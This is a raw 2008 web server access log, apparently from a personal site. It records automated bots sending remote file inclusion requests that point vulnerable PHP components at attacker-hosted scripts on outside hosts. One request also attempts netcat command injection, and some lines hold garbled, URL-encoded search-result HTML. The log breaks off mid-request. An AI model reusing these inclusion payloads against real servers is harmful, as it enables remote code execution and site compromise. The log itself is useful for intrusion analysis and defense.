85.159.91.143 - - [07/Aug/2008:02:55:27 -0500] "GET //?path%5Bdocroot%5D=http://bolikowski.com/eric/v6-id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
85.159.91.143 - - [07/Aug/2008:02:55:27 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://bolikowski.com/eric/v6-id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
85.159.91.143 - - [07/Aug/2008:02:55:28 -0500] "GET /logs//?path%5Bdocroot%5D=http://bolikowski.com/eric/v6-id.txt??? HTTP/1.1" 200 94316 "-""libwww-perl/5.79"
70.86.8.66 - - [07/Aug/2008:02:55:38 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://206.117.237.200/calendar/translations/french/tss2_rc2/pw.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
70.86.8.66 - - [07/Aug/2008:02:55:38 -0500] "GET //?path%5Bdocroot%5D=http://206.117.237.200/calendar/translations/french/tss2_rc2/pw.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
70.86.8.66 - - [07/Aug/2008:02:55:39 -0500] "GET /logs//?path%5Bdocroot%5D=http://206.117.237.200/calendar/translations/french/tss2_rc2/pw.txt? HTTP/1.1" 200 94316 "-""libwww-perl/5.810"
89.108.67.220 - - [07/Aug/2008:02:56:12 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
200.251.162.130 - - [07/Aug/2008:02:58:53 -0500] "GET /logs/errors.php?error=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.251.162.130 - - [07/Aug/2008:02:58:53 -0500] "GET /errors.php?error=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
70.86.8.66 - - [07/Aug/2008:03:01:21 -0500] "GET /logs//?path%5Bdocroot%5D=http://206.117.237.200/calendar/translations/french/tss2_rc2/pw.txt? HTTP/1.1" 200 94316 "-""libwww-perl/5.810"
70.86.8.66 - - [07/Aug/2008:03:01:21 -0500] "GET //?path%5Bdocroot%5D=http://206.117.237.200/calendar/translations/french/tss2_rc2/pw.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
77.90.20.2 - - [07/Aug/2008:03:03:14 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:20 -0500] "GET //components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:26 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:30 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:31 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:36 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:37 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:43 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:45 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:45 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:47 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:50 -0500] "GET //components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:50 -0500] "GET //components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:53 -0500] "GET //components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:53 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:55 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:57 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:58 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:03:58 -0500] "GET //components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:04:00 -0500] "GET //components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:04:02 -0500] "GET //components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:04:03 -0500] "GET //components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:04:13 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
212.97.132.101 - - [07/Aug/2008:03:04:15 -0500] "GET /logs/access_log.1208044800/newspublish/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 322 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:03:04:15 -0500] "GET /newspublish/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 295 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:03:04:16 -0500] "GET /logs/newspublish/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 300 "-""libwww-perl/5.53"
77.90.20.2 - - [07/Aug/2008:03:04:18 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
212.97.132.101 - - [07/Aug/2008:03:04:28 -0500] "GET /logs/access_log.1206230400/newspublish/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 322 "-""libwww-perl/5.53"
77.90.20.2 - - [07/Aug/2008:03:04:28 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:04:33 -0500] "GET //components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:05:00 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:05:05 -0500] "GET //components/com_flyspray/startdown.php?file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
82.49.28.184 - - [07/Aug/2008:03:05:50 -0500] "GET /newspublish/include.php?path[docroot]=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
82.49.28.184 - - [07/Aug/2008:03:05:50 -0500] "GET /logs/access_log.1206230400/newspublish/include.php?path[docroot]=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.808"
82.49.28.184 - - [07/Aug/2008:03:05:52 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.808"
89.108.67.220 - - [07/Aug/2008:03:06:15 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
89.108.67.220 - - [07/Aug/2008:03:06:16 -0500] "GET ///vwar/backup/errors.php?error=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
89.108.67.220 - - [07/Aug/2008:03:06:16 -0500] "GET /logs///vwar/backup/errors.php?error=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
82.49.28.184 - - [07/Aug/2008:03:06:26 -0500] "GET /logs/access_log.1208044800/newspublish/include.php?path[docroot]=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.808"
89.108.67.220 - - [07/Aug/2008:03:07:45 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
212.122.200.198 - - [07/Aug/2008:03:09:24 -0500] "GET /logs//module.inc.php?MODULE_FOLDER=/module.inc.php?MODULE_FOLDER=%20%22netcat%20require%22%20-p%20103%0D?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
212.122.200.198 - - [07/Aug/2008:03:09:24 -0500] "GET //module.inc.php?MODULE_FOLDER=/module.inc.php?MODULE_FOLDER=%20%22netcat%20require%22%20-p%20103%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.251.162.130 - - [07/Aug/2008:03:12:52 -0500] "GET /logs/phphtml.php?htmlclass_path=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
200.251.162.130 - - [07/Aug/2008:03:12:53 -0500] "GET /phphtml.php?htmlclass_path=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
200.251.162.130 - - [07/Aug/2008:03:15:35 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
200.251.162.130 - - [07/Aug/2008:03:15:36 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
70.86.186.90 - - [07/Aug/2008:03:15:46 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
70.86.186.90 - - [07/Aug/2008:03:15:46 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
70.86.186.90 - - [07/Aug/2008:03:15:46 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
209.97.201.148 - - [07/Aug/2008:03:16:13 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sujianto.com/load.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
209.97.201.148 - - [07/Aug/2008:03:16:14 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sujianto.com/load.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
85.17.150.2 - - [07/Aug/2008:03:16:21 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.17.150.2 - - [07/Aug/2008:03:16:21 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.17.150.2 - - [07/Aug/2008:03:17:12 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.231.0.98 - - [07/Aug/2008:03:17:31 -0500] "GET //modules/xfsection/modify.php?dir_module=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
89.108.67.220 - - [07/Aug/2008:03:17:33 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
89.108.67.220 - - [07/Aug/2008:03:17:34 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
190.41.11.250 - - [07/Aug/2008:03:17:34 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
190.41.11.250 - - [07/Aug/2008:03:17:34 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:17:56 -0500] "GET /logs/access_log.1215216000//components/com_flyspray/startdown.php?file=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
77.90.20.2 - - [07/Aug/2008:03:17:56 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
77.90.20.2 - - [07/Aug/2008:03:17:56 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
77.90.20.2 - - [07/Aug/2008:03:17:56 -0500] "GET /logs/access_log.1216425600//components/com_flyspray/startdown.php?file=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
89.108.67.220 - - [07/Aug/2008:03:19:06 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
89.108.67.220 - - [07/Aug/2008:03:19:06 -0500] "GET //?path%5Bdocroot%5D=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
89.108.67.220 - - [07/Aug/2008:03:19:12 -0500] "GET /logs//?path%5Bdocroot%5D=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 200 94316 "-""libwww-perl/5.812"
89.108.67.220 - - [07/Aug/2008:03:19:39 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
89.108.67.220 - - [07/Aug/2008:03:19:40 -0500] "GET //?path%5Bdocroot%5D=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
89.108.67.220 - - [07/Aug/2008:03:19:41 -0500] "GET /logs//?path%5Bdocroot%5D=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 200 94316 "-""libwww-perl/5.812"
209.97.201.148 - - [07/Aug/2008:03:20:17 -0500] "GET /logs/access_log.1214438400%22%20%20lang=%22de%22%3ETomdolan.pconline.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1214438400&lp=de_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22de%22%3EHTTP/1.1%22%20404%20295%20%22-%22%22libwww-perl/5.810%22%2072.29.73.67%20-%20-%20[25/Jun/2008:19:00:30%20...%20components/com_mp3_allopass/allopass.php?mosConfig_live_site=ftp:/24.227.40.218%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1214438400%3C/span%3E%20-%20%3Cem%3E525k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGki0Cr5pI7fQA1etXNyoA;_ylu=X3oDMTB0OWRnbWlkBHNlYwNzcgRwb3MDNzA5BGNvbG8Dc2sxBHZ0aWQD/SIG=11qen35os/EXP=1218183298/**http%3a/www.waraxe.us/ftopict-1984.html/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://reisebuerotechnik24.de/foggian.txt??? HTTP/1.1" 404 442 "-""libwww-perl/5.79"
209.97.201.148 - - [07/Aug/2008:03:20:17 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://reisebuerotechnik24.de/foggian.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
209.97.201.148 - - [07/Aug/2008:03:20:17 -0500] "GET /logs/access_log.1214438400%22%20%20lang=%22de%22%3ETomdolan.pconline.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1214438400&lp=de_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22de%22%3EHTTP/1.1%22%20404%20295%20%22-%22%22libwww-perl/5.810%22%2072.29.73.67%20-%20-%20[25/Jun/2008:19:00:30%20...%20components/com_mp3_allopass/allopass.php?mosConfig_live_site=ftp:/24.227.40.218%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1214438400%3C/span%3E%20-%20%3Cem%3E525k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGki0Cr5pI7fQA1etXNyoA;_ylu=X3oDMTB0OWRnbWlkBHNlYwNzcgRwb3MDNzA5BGNvbG8Dc2sxBHZ0aWQD/SIG=11qen35os/EXP=1218183298/**http%3a/www.waraxe.us/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://reisebuerotechnik24.de/foggian.txt??? HTTP/1.1" 404 442 "-""libwww-perl/5.79"
200.251.162.130 - - [07/Aug/2008:03:20:35 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
200.251.162.130 - - [07/Aug/2008:03:20:35 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
209.25.195.243 - - [07/Aug/2008:03:20:51 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
209.25.195.243 - - [07/Aug/2008:03:20:51 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
209.25.195.243 - - [07/Aug/2008:03:20:51 -0500] "GET //ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.810"
209.25.195.243 - - [07/Aug/2008:03:20:51 -0500] "GET //ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.810"
209.97.201.148 - - [07/Aug/2008:03:20:52 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://reisebuerotechnik24.de/foggian.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
209.97.201.148 - - [07/Aug/2008:03:20:52 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://reisebuerotechnik24.de/foggian.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
85.17.150.2 - - [07/Aug/2008:03:23:31 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.17.150.2 - - [07/Aug/2008:03:23:31 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.108.67.220 - - [07/Aug/2008:03:25:34 -0500] "GET /logs//?path%5Bdocroot%5D=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 200 94316 "-""libwww-perl/5.812"
89.108.67.220 - - [07/Aug/2008:03:25:35 -0500] "GET //?path%5Bdocroot%5D=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
209.97.201.148 - - [07/Aug/2008:03:25:35 -0500] "GET /logs/access_log.1212883200%22%20%20lang=%22nl%22%3ETomdolan.pconline.com%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22nl%22%3EHTTP/1.1%22%20404%20324%20%22-%22%22libwww-perl/5.76%22%2062.140.19.142%20-%20-%20[07/Jun/2008:19:02:27%20...%20Slurp;%20http:/help.yahoo.com/help/us/ysearch/slurp)%22%2087.106.101.24%20-%20-%20[07/Jun%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1212883200%3C/span%3E%20-%20%3Cem%3E304k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGkmAEr5pIoS0B49BXNyoA;_ylu=X3oDMTB0MWZscWdvBHNlYwNzcgRwb3MDODc2BGNvbG8Dc2sxBHZ0aWQD/SIG=126g27ae0/EXP=1218183300/**http%3a/zhuaxia.com/pre_channel/122350/%3flogId=181%22%20%20lang=%22zh%22%3EWEB%20-%20%20-%20%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22zh%22%3EWEB%20-%20%20...%20277%20%7C%201-10%20%7C%20%20%201%202%203%204%205%206%207%208%209%2010%2011%20>%200%20%20.%20MD5()%20...%20components/com_mp3_allopass/allopass.php?%20...%3C/div%3E%3Cspan%20class=url%3Ezhuaxia.com/pre_channel/122350/%3Cwbr%20/%3E?logId=181%3C/span%3E%20-%20%3Cem%3E148k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGkmAEr5pIoS0B5NBXNyoA;_ylu=X3oDMTB0NTJtNzhvBHNlYwNzcgRwb3MDODc3BGNvbG8Dc2sxBHZ0aWQD/SIG=12dml0jhe/EXP=1218183300/**http%3a/dvd.czdc.cz/home-php-mos-onfig-absolute-path-http-/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://reisebuerotechnik24.de/foggian.txt??? HTTP/1.1" 404 1218 "-""libwww-perl/5.79"
209.97.201.148 - - [07/Aug/2008:03:25:36 -0500] "GET /logs/access_log.1212883200%22%20%20lang=%22nl%22%3ETomdolan.pconline.com%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22nl%22%3EHTTP/1.1%22%20404%20324%20%22-%22%22libwww-perl/5.76%22%2062.140.19.142%20-%20-%20[07/Jun/2008:19:02:27%20...%20Slurp;%20http:/help.yahoo.com/help/us/ysearch/slurp)%22%2087.106.101.24%20-%20-%20[07/Jun%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1212883200%3C/span%3E%20-%20%3Cem%3E304k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGkmAEr5pIoS0B49BXNyoA;_ylu=X3oDMTB0MWZscWdvBHNlYwNzcgRwb3MDODc2BGNvbG8Dc2sxBHZ0aWQD/SIG=126g27ae0/EXP=1218183300/**http%3a/zhuaxia.com/pre_channel/122350/%3flogId=181%22%20%20lang=%22zh%22%3EWEB%20-%20%20-%20%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22zh%22%3EWEB%20-%20%20...%20277%20%7C%201-10%20%7C%20%20%201%202%203%204%205%206%207%208%209%2010%2011%20>%200%20%20.%20MD5()%20...%20components/com_mp3_allopass/allopass.php?%20...%3C/div%3E%3Cspan%20class=url%3Ezhuaxia.com/pre_channel/122350/%3Cwbr%20/%3E?logId=181%3C/span%3E%20-%20%3Cem%3E148k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGkmAEr5pIoS0B5NBXNyoA;_ylu=X3oDMTB0NTJtNzhvBHNlYwNzcgRwb3MDODc3BGNvbG8Dc2sxBHZ0aWQD/SIG=12dml0jhe/EXP=1218183300/**http%3a/dvd.czdc.cz/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://reisebuerotechnik24.de/foggian.txt??? HTTP/1.1" 404 1218 "-""libwww-perl/5.79"
209.97.201.148 - - [07/Aug/2008:03:26:05 -0500] "GET /logs/access_log.1212883200%22%20%20lang=%22nl%22%3ETomdolan.pconline.com%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22nl%22%3EHTTP/1.1%22%20404%20324%20%22-%22%22libwww-perl/5.76%22%2062.140.19.142%20-%20-%20[07/Jun/2008:19:02:27%20...%20Slurp;%20http:/help.yahoo.com/help/us/ysearch/slurp)%22%2087.106.101.24%20-%20-%20[07/Jun%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1212883200%3C/span%3E%20-%20%3Cem%3E304k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGkxMGr5pIPFIBna1XNyoA;_ylu=X3oDMTB0MWZscWdvBHNlYwNzcgRwb3MDODc2BGNvbG8Dc2sxBHZ0aWQD/SIG=126kn0bnp/EXP=1218183302/**http%3a/zhuaxia.com/pre_channel/122350/%3flogId=181%22%20%20lang=%22zh%22%3EWEB%20-%20%20-%20%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22zh%22%3EWEB%20-%20%20...%20277%20%7C%201-10%20%7C%20%20%201%202%203%204%205%206%207%208%209%2010%2011%20>%200%20%20.%20MD5()%20...%20components/com_mp3_allopass/allopass.php?%